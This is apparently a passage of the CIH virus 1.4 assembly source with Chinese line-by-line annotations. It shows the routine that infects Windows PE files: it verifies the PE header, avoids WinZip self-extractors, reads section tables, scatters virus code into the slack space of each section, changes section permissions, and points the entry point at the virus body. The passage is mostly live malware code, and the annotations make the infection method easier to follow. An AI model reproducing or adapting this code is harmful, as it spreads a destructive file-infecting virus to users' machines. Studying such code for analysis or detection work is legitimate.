_cih病毒1.4版本之中文注释.txt

CIH病毒源码

mov eax, ebp ;功能号 
call edi ; VXDCall IFSMgr_Ring0_FileIO ;读文件到esi 

; *************************** 
; * Is PE !? * 
; *************************** 
; * Is the File * 
; * Already Infected !? * 
; *************************** 
; * WinZip Self-Extractor * 
; * doesn't Have Infected * 
; * Mark Because My Virus * 
; * doesn't Infect it. * 
; *************************** 

; cmp [esi], '\0PE\0' 
cmp dword ptr [esi], 00455000h ;判断是否是PE文件(标志"PE\0\0") 
jne CloseFile ;不是就关闭文件 

; ************************************* 
; * The File is ^o^ * 
; * PE(Portable Executable) indeed. * 
; ************************************* 
; * The File isn't also Infected. * 
; ************************************* 

; ************************************* 
; * Start to Infect the File * 
; ************************************* 
; * Registers Use Status Now : * 
; * * 
; * EAX = 04h * 
; * EBX = File Handle * 
; * ECX = 04h * 
; * EDX = 'PE\0\0' Signature of * 
; * ImageFileHeader Pointer's * 
; * Former Byte. * 
; * ESI = DataBuffer Address ==> @8 * 
; * EDI = IFSMgr_Ring0_FileIO Address * 
; * EBP = D600h ==> Read Data in File * 
; ************************************* 
; * Stack Dump : * 
; * * 
; * ESP => ------------------------- * 
; * | EFLAG(CF=0) | * 
; * ------------------------- * 
; * | FileNameBufferPointer | * 
; * ------------------------- * 
; * | EDI | * 
; * ------------------------- * 
; * | ESI | * 
; * ------------------------- * 
; * | EBP | * 
; * ------------------------- * 
; * | ESP | * 
; * ------------------------- * 
; * | EBX | * 
; * ------------------------- * 
; * | EDX | * 
; * ------------------------- * 
; * | ECX | * 
; * ------------------------- * 
; * | EAX | * 
; * ------------------------- * 
; * | Return Address | * 
; * ------------------------- * 
; ************************************* 

push ebx ; Save File Handle ;保存文件句柄 

push 00h ; Set VirusCodeSectionTableEndMark 

; *************************** 
; * Let's Set the * 
; * Virus' Infected Mark * 
; *************************** 

push 01h ; Size 
push edx ; Pointer of File ;edx指向PE文件头偏移00h 
push edi ; Address of Buffer ;edi为IFSMgr_Ring0_FileIO的地址(原注释有误) 

; *************************** 
; * Save ESP Register * 
; *************************** 

mov dr1, esp 

; *************************** 
; * Let's Set the * 
; * NewAddressOfEntryPoint * 
; * ( Only First Set Size ) * 
; *************************** 

push eax ; Size 

; *************************** 
; * Let's Read * 
; * Image Header in File * 
; *************************** 

mov eax, ebp 
mov cl, SizeOfImageHeaderToRead ;要读2个字节(WORD NumberOfSections) 
add edx, 07h ; Move EDX to NumberOfSections ;PE文件头+07h为NumberOfSections(块个数) 
call edi ; VXDCall IFSMgr_Ring0_FileIO ;读出NumberOfSections(块个数)到esi 

; *************************** 
; * Let's Set the * 
; * NewAddressOfEntryPoint * 
; * ( Set Pointer of File, * 
; * Address of Buffer ) * 
; *************************** 

lea eax, (AddressOfEntryPoint-@8)[edx] 
push eax ; Pointer of File 

lea eax, (NewAddressOfEntryPoint-@8)[esi] 
push eax ; Address of Buffer 

; *************************** 
; * Move EDX to the Start * 
; * of SectionTable in File * 
; *************************** 

movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi] 
lea edx, [eax+edx+12h] ;edx为SectionTable的偏移 

; *************************** 
; * Let's Get * 
; * Total Size of Sections * 
; *************************** 

mov al, SizeOfScetionTable ;每个块表项(ScetionTable)的大小(字节) 

; I Assume NumberOfSections <= 0ffh 
mov cl, (NumberOfSections-@8)[esi] 

mul cl ;每个块表项乘以块个数=块表大小 

; *************************** 
; * Let's Set Section Table * 
; *************************** 

; Move ESI to the Start of SectionTable 
lea esi, (StartOfSectionTable-@8)[esi] ;esi指向块表首址(在病毒动态数据区中) 

push eax ; Size ;块表大小 
push edx ; Pointer of File ;edx为SectionTable的偏移 
push esi ; Address of Buffer ; 

; *************************** 
; * The Code Size of Merge * 
; * Virus Code Section and * 
; * Total Size of Virus * 
; * Code Section Table Must * 
; * be Small or Equal the * 
; * Unused Space Size of * 
; * Following Section Table * 
; *************************** 

inc ecx 
push ecx ; Save NumberOfSections+1 

shl ecx, 03h ;*8 
push ecx ; Save TotalSizeOfVirusCodeSectionTable ;预留病毒块表空间 

add ecx, eax 
add ecx, edx ;ecx+文件的正文的偏移 

sub ecx, (SizeOfHeaders-@9)[esi] 
not ecx 
inc ecx ;求补 
;ecx为文件头大小-正文的偏移=未用空间 
; Save My Virus First Section Code 
; Size of Following Section Table... 
; ( Not Include the Size of Virus Code Section Table ) 
push ecx 

xchg ecx, eax ; ECX = Size of Section Table ;ecx为块表大小 

; Save Original Address of Entry Point 
mov eax, (AddressOfEntryPoint-@9)[esi] ;入口RVA地址 
add eax, (ImageBase-@9)[esi] ;装入基址 
mov (OriginalAddressOfEntryPoint-@9)[esi], eax ;保存装入后实际的入口地址 

cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection ;未用空间和病毒第一块大小比较
jl OnlySetInfectedMark ;小于就只设感染标志

; *************************** 
; * Read All Section Tables * 
; *************************** 

mov eax, ebp ;读的功能号 
call edi ; VXDCall IFSMgr_Ring0_FileIO ;读块表到esi(@9处) 

; *************************** 
; * Full Modify the Bug : * 
; * WinZip Self-Extractor * 
; * Occurs Error... * 
; *************************** 
; * So When User Opens * 
; * WinZip Self-Extractor, * 
; * Virus Doesn't Infect it.* 
; *************************** 
; * First, Virus Gets the * 
; * PointerToRawData in the * 
; * Second Section Table, * 
; * Reads the Section Data, * 
; * and Tests the String of * 
; * 'WinZip(R)'...... * 
; *************************** 

xchg eax, ebp 

push 00000004h 
pop ecx ;读4字节 

push edx 
mov edx, (SizeOfScetionTable+PointerToRawData-@9)[ebx] ;edx为第二块的偏移(.rdata) 

add edx, 12h ;加10h+2h(10h处为"WinZip....") 

call edi ; VXDCall IFSMgr_Ring0_FileIO ;读4字节到esi 

; cmp [esi], 'nZip' 
cmp dword ptr [esi], 'piZn' ;判断是否是WinZip自解压文件 
je NotSetInfectedMark ;是就不设置感染标志 

pop edx ;edx指向块表在文件中首址 

; *************************** 
; * Let's Set Total Virus * 
; * Code Section Table * 
; *************************** 

; EBX = My Virus First Section Code 
; Size of Following Section Table 
pop ebx ; 未用空间大小 
pop edi ; EDI = TotalSizeOfVirusCodeSectionTabl 
pop ecx ; ECX = NumberOfSections+1 

push edi ; Size 

add edx, ebp ; ebp为块表大小 
push edx ; Pointer of File ;指向块表后(第一块) 

add ebp, esi ; ebp指向病毒数据区的块表后(第一块) 
push ebp ; Address of Buffer 

; *************************** 
; * Set the First Virus * 
; * Code Section Size in * 
; * VirusCodeSectionTable * 
; *************************** 

lea eax, [ebp+edi-04h] 
mov [eax], ebx ;设置病毒代码第一块的大小(未用空间大小)到病毒块表 

; *************************** 
; * Let's Set My Virus * 
; * First Section Code * 
; *************************** 

push ebx ; Size ;病毒代码第一块的大小(未用空间大小) 

add edx, edi 
push edx ; Pointer of File ;指向块表后(第一块)+Size??=病毒正文(病毒开始处) 

lea edi, (MyVirusStart-@9)[esi] 
push edi ; Address of Buffer ;指向病毒开始处 

; *************************** 
; * Let's Modify the * 
; * AddressOfEntryPoint to * 
; * My Virus Entry Point * 
; *************************** 

mov (NewAddressOfEntryPoint-@9)[esi], edx ;保存新的程序入口(病毒正文) 

; *************************** 
; * Setup Initial Data * 
; *************************** 

lea edx, [esi-SizeOfScetionTable] ;edx先减一项块表长度,以配合下面的"助标1"
mov ebp, offset VirusSize ;ebp为病毒长度 

jmp StartToWriteCodeToSections 

; *************************** 
; * Write Code to Sections * 
; *************************** 

LoopOfWriteCodeToSections: 
　　
add edx, SizeOfScetionTable ;助标1: 
;指向下一块表项 
mov ebx, (SizeOfRawData-@9)[edx] ;ebx为该块表项的SizeOfRawData(块大小) 
sub ebx, (VirtualSize-@9)[edx] ;减去VirtualSize=该块未用空间 
jbe EndOfWriteCodeToSections 

push ebx ; Size 

sub eax, 08h 
mov [eax], ebx ;写入病毒块表 

mov ebx, (PointerToRawData-@9)[edx] ;ebx为块的物理(实际)偏移? 
add ebx, (VirtualSize-@9)[edx] ;加上VirtualSize 
push ebx ; Pointer of File ;ebx指向该块未用空间的文件指针 

push edi ; Address of Buffer 

mov ebx, (VirtualSize-@9)[edx] 
add ebx, (VirtualAddress-@9)[edx] 
add ebx, (ImageBase-@9)[esi] ;ebx为该块装入后的实际地址 
mov [eax+4], ebx ;保存到病毒块表中 

mov ebx, [eax] ;该块未用空间大小 
add (VirtualSize-@9)[edx], ebx ;加到该块表项的VirtualSize

; Section contains initialized data ==> 00000040h 
; Section can be Read. ==> 40000000h 
or (Characteristics-@9)[edx], 40000040h ;改该块表项的块属性(改为可读,并包含初始化数据) 

StartToWriteCodeToSections: 

sub ebp, ebx ;病毒大小-病毒块大小 
jbe SetVirusCodeSectionTableEndMark ;如果小于(病毒插入完毕)就设置病毒块表结束符

add edi, ebx ; Move Address of Buffer ;指向病毒下一块 

EndOfWriteCodeToSections: 

loop LoopOfWriteCodeToSections 

; *************************** 
; * Only Set Infected Mark * 
; *************************** 

OnlySetInfectedMark: 
mov esp, dr1 ;只设置感染标志 

jmp WriteVirusCodeToFile ;跳到写病毒到要传染的文件的程序 

; *************************** 
;